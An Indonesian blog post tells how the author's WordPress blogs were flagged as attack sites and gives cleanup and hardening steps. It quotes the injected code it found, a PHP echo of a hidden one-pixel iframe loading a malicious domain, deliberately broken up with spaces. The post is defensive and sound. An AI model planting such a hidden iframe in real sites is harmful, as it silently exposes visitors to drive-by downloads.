Reported Attack Site!

Tagged with: Blogging , google , Internet , virus , Wordpress

Dua hari yang lalu (1 Juni 2009) ketika saya ingin membuka blog ini, secara mengejutkan…keluar halaman warning pada jendela firefox saya, sebuah warning yang memberi peringatan bagi saya bahwa blog saya telah di blok bagi pengguna google, karena (menurut google) blog saya telah menjadi “suspect” penyusupan oleh oknum yang tidak bertanggung jawab yang menyusupkan script-script yang membuat pengunjung blog saya secara otomatis akan terdownload sebuah program, atau disusupi pranala yang mengarah ke alamat situs yang telah lebih dulu menjadi “suspect” google.

Nah disini saya sempat bingung, karena banyak sekali plugins wordpress yang sudah saya install sebelumnya, dan memang kebanyakan plugins pastilah menyisipkan pranala ke halaman sang pembuatnya, sehingga pusing juga kalo mesti ngecek satu-satu.

Belum lagi, ternyata hal ini juga menimpa blog-blog wordpress saya yang lain yang juga saya host pada web hosting yang sama…!!!

Akhirnya saya menemukan satu tools diinternet yang mampu mendeteksi parasit apa yang kira-kira menempel di blog kita. coba klik Unmask Parasites, dengan menggunakan tools ini akhirnya saya mengetahui kalo ada pengacau yang merasuki blog saya, berikut kita-kira segelintir tag html yang disisipkan :

e cho “< i f rame src=\”http://s a a r c o p.com/?click=4AD4F99\” width=1 height=1 style=\”visibility:hidden;position:absolute\”>< / i frame>”;

*) antara e cho, < i f rame,  s a a r c o p, dan < / i frame sengaja saya beri spasi untuk menghindari kemungkinan teraksekusi kembali script diatas.

Setelah saya coba bedah isi file didalam directory root hosting saya, saya menemui kalo parasit ini ada di file index.php di root blog dan index.php di dalam directory theme yang saya gunakan.

Dari hasil hunting info sana-sini, akhirnya saya memutuskan untuk memulai melakukan langkah pembersihan, berikut langkah-langkah yang saya ambil :

1. Saya backup database wordpress saya sebagai prioritas utama
2. Saya pindahkan file-file wordpress melalui ftp ke dalam folder baru bernama backup
3. Di directory root saya kini bersih, saya upload file-file wordpress yang masih fresh yang saya download melalui wordpress.org
4. Nah, di wordpress yang kini masih fresh…tentunya kalo kita jalankan, kita pasti akan diminta untuk melakukan proses instalasi. Jadi lebih baik jangan lakukan ini. Ok, lantas bagaimana cara untuk mengembalikannya seperti semula. Kita lanjutkan dibawah
5. Pindahkan file .htaccess, wp-config dari folder backup tadi ke folder root wordpress. Bila anda memiliki file-file verifikasi google, yahoo seperti google7c1b9f30543de3f1.html atau yang lainnya, silahkan pindahkan file-file ini juga. Begitu juga bila anda memiliki file sitemap.xml ataupun file kompresinya (sitemap.xml.gz) ini juga sebaiknya anda kembalikan ke root. TAPI sebaiknya anda pastikan dulu kalau semua file-file tersebut telah bebas dari parasit!
6. Ok. kemudian bila anda menggunakan theme yang tidak standard (seperti saya), anda bisa pindahkan theme yang anda gunakan dari folder backup/wp-content/themes/folder theme anda ke folder wp-content/theme/folder theme anda di directory root. TAPI lagi-lagi, pastikan semua file yang ada didalam folder tersebut telah bebas parasit (terutama untuk file index.php).
7. Bila anda pengguna wordpress extend plugins seperti saya, sebaiknya anda juga memindahkan semua isi didalam folder backup/wp-content/plugins ke folder wp-content/plugins di root wordpress. Yep, sama juga, pastikan semuanya telah bersih
8. Satu lagi, bila sudah banyak sekali file, gambar, dll yang sudah anda upload ke server anda melalui wordpress anda, itu artinya anda juga harus mengembalikan file-file tersebut ke tempat asalnya. Pindahkan folder backup/wp-content/uploads ke folder wp-content/uploads di root wordpress anda (bila folder uploads belum ada, silahkan dibuat saja, karena skema directory fresh wordpress awalnya memang tidak menyediakan directory uploads). Seperti biasa…semua ini juga perlu dicek kebersihannya yah
9. Bila ternyata masih ada file-file non standard wordpress namun berhubungan dengan wordpress anda, dan tadi ikut terbackup ke dalam folder backup, silahkan kembalikan file-file tersebut ketempat asalnya DALAM KEADAAN BERSIH
10. That’s it…selesai deh…selanjutnya anda hapus saja semua yang tersisa di folder backup.

Kemudian (ini juga hasil observasi dari internet), saya juga menganjurkan agar anda melakukan langkah-langkah tambahan untuk menghindari hal-hal seperti ini terjadi lagi dikemudian hari.

• Ganti password FTP anda sekarang juga, password harus unik dan sebaiknya penggantian password dilakukan secara berkala.
• Selalu lakukan backup file dan database wordpress anda secara berkala.
• Gunakan seminimal mungkin plugins wordpress…bukan hal yang mustahil bisa tiap-tiap plugins berpotensi memiliki celah-celah keamanan yang akan membahayakan wordpress anda.
• Hapus file-file plugins yang tidak aktif dari folder plugins wordpress anda melalui ftp.
• Hapus folder-folder theme yang tidak digunakan.
• Sebaiknya buat user administator baru, jangan gunakan standard administrator user “admin”, hapus user “admin” dari list user anda, gunakan password yang unik dan ganti passsord secara berkala.
• Review ulang lagi folder permission wordpress anda, gunakan chmod di ftp untuk mengubah permission folder anda. Berikut permission yang direkomendasikan :

Nama	File/Dir	Chmod yang direkomendasikan
root directory	../	0755
wp-includes/	../wp-includes	0755
.htaccess	../.htaccess	0644
wp-admin/index.php	index.php	0644
wp-admin/js/	js/	0755
wp-content/themes/	../wp-content/themes	0755
wp-content/plugins/	../wp-content/plugins	0755
wp-admin/	../wp-admin	0755
wp-content/	../wp-content	0755

Adapun langkah selanjutnya yang sangat penting, bila anda sudah merasa sudah tidak ada lagi parasit yang menempel di blog anda (lakukan scanning ulang menggunakan Unmask Parasites), maka anda harus mengajukan review oleh google bahwa web/blog anda kini telah bebas dari parasit. Hal ini agar cap buruk yang yang google berikan yang membuat akses ke blog anda di tutup dan mendapat warning oleh browser firefox bisa segera dihilangkan. Caranya adalah melalui layanan Google Webmaster Tools, silahkan daftar bila memang anda belum memiliki accountnya. Saya akan membahas mengenai hal ini mendatang. Hmmm…lama proses review google mungkin akan menghabiskan waktu setidaknya 1×24 jam. So, be patient

Ok, hal-hal diatas (kejadian dan penanganannya) merupakan pengalaman saya pribadi, mungkin terlihat agak rumit, cuma saya memang tidak mau mengambil resiko masih tersisanya parasit-parasit tersebut di blog saya. Hal-hal diatas juga saya jalani untuk pemulihan blog-blog saya yang lain. Saat ini blog saya telah kembali seperti semua dan bebas parasit, tapi bagaimanapun juga bukan hal yang mustahil bila dikemudian hari hal seperti ini bahkan mungkin lebih parah lagi bisa saja terjadi.

Bila anda pernah mengalami hal yang serupa, dan telah berhasil mengatasinya, mungkin anda bisa share juga disini. Semoga hal ini bisa membantu anda-anda semua

Related posts:

1. Berikan cinta ++ dengan nofollow Dipostingan terdahulu saya sudah membahas soal bagaimana seharusnya sikap yang...
2. [Tutorial] Nampilin poto secara acak (Random) anda punya koleksi poto yang ingin anda tampili di website/blog/jurnal...
3. Tebarkan cinta dengan commentluv Sebagai seorang blogger, pastilah kita tahu pada budaya tukar link...
4. Pilih sendiri www atau tanpa www Kebanyakan server memperbolehkan penggunaan www.domainanda.com ataupun domainanda.com (tanpa www) terakses...
5. NoFollow atau DoFollow?? Hffff…Akhirnya masa penantian telah tiba…setelah menunggu dan memantau selama...